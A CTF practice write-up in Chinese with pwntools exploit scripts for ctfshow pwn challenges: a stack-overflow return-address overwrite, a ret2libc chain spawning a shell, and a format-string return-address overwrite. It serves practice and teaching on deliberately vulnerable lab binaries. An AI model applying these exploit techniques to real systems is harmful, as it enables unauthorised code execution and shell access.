PWN-PRACTICE-CTFSHOW-1

PWN签到题

nc连上去就会打印flag

pwn02

栈溢出，覆盖返回地址为后门函数stack起始地址即可

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28194)
elf=ELF("./pwn1")

stack=0x0804850F

io.recvuntil("32bits\n\n")
payload="a"*9+"bbbb"+p32(stack)
io.sendline(payload)

io.interactive()

pwn03

栈溢出，ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28045)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x080484DF

#gdb.attach(io,"b * 0x080484DD")
#pause()

io.recvuntil("32bits\n\n")
payload="a"*9+"bbbb"+p32(puts_plt)+p32(main_addr)+p32(puts_got)
io.sendline(payload)
puts_addr=u32(io.recv(4))
print("puts_addr=="+hex(puts_addr))
# libc:libc6-i386_2.27-3ubuntu1_amd64
libc_base=puts_addr-0x067360
system=libc_base+0x03cd10
binsh=libc_base+0x17b8cf

io.recvuntil("32bits\n\n")
payload="a"*9+"bbbb"+p32(system)+p32(main_addr)+p32(binsh)
io.sendline(payload)

#pause()

io.interactive()

pwn04

两次格式化字符串漏洞
第一次格式化字符串，随便泄露一个栈上的地址，通过偏移得到返回地址在栈上的地址
第二次格式化字符串，覆盖返回地址为后门函数getshell的起始地址

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28013)
elf=ELF("./pwn1")

getshell=0x0804859B

#gdb.attach(io,"b * 0x08048665")
#pause()

io.recvuntil("Hello Hacker!\n")
payload1="%14$p"
io.sendline(payload1)
io.recvuntil("0x")
stack_addr=int(io.recvuntil("\n")[:-1],16)
print("stack_addr=="+hex(stack_addr))
ret_addr=stack_addr+0x14

payload2=p32(ret_addr+1)+"%"+str(0x85-4)+"c"+"%6$hhna"
payload2+=p32(ret_addr)+"%"+str(0x9B-0x85-1-4)+"c"+"%10$hhn"
io.sendline(payload2)
print(len(payload2))

#pause()

io.interactive()